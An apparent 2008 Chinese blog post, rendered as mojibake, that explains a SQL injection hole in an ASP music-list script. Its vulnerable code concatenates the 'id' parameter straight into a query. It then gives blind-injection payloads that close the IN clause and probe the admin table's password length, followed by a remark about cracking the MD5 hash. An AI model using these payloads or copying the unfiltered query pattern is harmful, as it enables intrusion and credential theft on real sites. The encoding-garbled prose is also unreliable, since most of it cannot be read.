ÓÐÒ»ÖÖÈ˽к£Ôô£¬ËûÃǰÑ×Ô¼ºµÄÐÅÄî¼ÄÍÐÓÚ÷¼÷ÃÆì£¬Ö»ÒªÓÐ÷¼÷ÃÆìÉýÆðµÄµØ·½£¬ËûÃǾͻáΪ×Ô¼ºµÄÃÎÏë¶øÕ½
²é¿´ÎÄÕ |
Ò»¶Î´æÔÚ×¢Èë©¶´µÄasp´úÂëÏê½â
2008Äê08ÔÂ17ÈÕ ÐÇÆÚÈÕ 08:40
ÔÚÍøÉÏ¿´µ½ÁËÒ»¶Î´úÂë:(ºóÃæÊÇÎÒ×ö¹Ø¼ü²¿·ÖµÄ½âÊÍ£© <!--#include file="../user/conn.asp"--> <!--#include file="Path.Asp"--> <ASX version = "3.0"> <% id1=replace(request("id"),"","") ‘replaceº¯Êý×ö¼òµ¥µÄ¹ýÂË£¬ÆäʵûЧ¹ûµÄ if id1<>"" then ’ÅжÏid1ÊÇ·ñΪ¿Õ set rs=server.createobject("adodb.recordset") id=id1 sql="select * from MusicList where id in (" & id & ")" ‘¿´½ö½öÅжÏÊÇ·ñΪ¿Õ¾Í´øÈëÁËsqlÓï ¾ä ²éѯ£¬Õâ¸ö¼òµ¥£¬´ó¼Ò¶¼»á rs.open sql,conn,1,3 rs("hits")=rs("hits")+1 ’ÎÊÌâ¾Í³öÔÚÕâÀÕâÒ»¾ä£¬ºóÃæÏêϸ½âÊÍ rs.update songpath=rs("song_path") If songpath="" or IsNull(songpath) Then ºóÃæµÄ¾Í²»ÔõôÓйØÁË£¬¾Í²»Ïêϸ·ÖÎöÁË¡£ songpath=1 End If select Case songpath Case 1 song_path=song_path1 Case 2 song_path=song_path2 Case 3 song_path=song_path3 Case 4 song_path=song_path4 Case 5 song_path=song_path5 Case 6 song_path=song_path6 Case 7 song_path=song_path7 End select song_path=song_path&rs("Wma") £££££££££££££££££££££²¿·Ö´úÂëÊ¡ÂÔ ¿´ÏÂÕâ¶Î´úÂ룬ÓÐѧ¹ýaspµÄÈË£¬Õâ¸ö²»ÊǺÜÃ÷ÏÔµÄûÓйýÂË×¢Èë²úÉúÁË£¿Ã»´í£¬ÎÒµ±Ê±Ò»ÑÛ¾Í˵´æÔÚ×¢É䣬¿ÉÊÇÎÒºóÃæÓÖ×Ðϸ¿´ÁË¡«£¬¿´µ½ÁËÕâÐÐ rs("hits")=rs("hits")+1 rs.update ×¢Ò⵽û,Õâ¾ä¾ÍʹÎÒÃǵÄunionÎÞ´¦¿ÉÓÃÁË£¬ÒòΪÄǸö³öÀ´ÊDz»¿ÉдµÄ¡£ÄÇôÎÒÃÇÖ»ÓÐͨ¹ý¹¹Ôì¾µäµÄsqlÓï¾äÁË£¬¿´ÎÒ¹¹Ô죺 id=1) sql and 1 in (1 ǰºóµÄ±£Ö¤³öÀ´µÄÓмǼ,¼ÓÉÏÖмä¼ÓÎÒÃÇ×Ô¼ºµÄsqlÓï¾ä,¾Í¿ÉÒÔ×¢ÉäÁË.¼ÙÉèÕâÀï¹Ø¼ü±íÊÇadmin,×Ö¶ÎÓÐ password , username ÄÇô¾Í¿ÉÒÔÕâÑùдÁË£º id=1) and (select top 1 len(password) from admin)=16 and 1 in (1 ³öÀ´µÄÒ»°ãÊÇÃæµÄmd5¼ÓÃܵģ¬È¥ÅÜÏ£¬ºóÃæµÄ×Ô¼º¿´ÁËСÎÊÌ⣬½â¾ö¾ÍºÃÁË£¬²»¹ý²»×¢Ò⻹ÊDz»Ðеġ«¡« |
×î½ü¶ÁÕߣº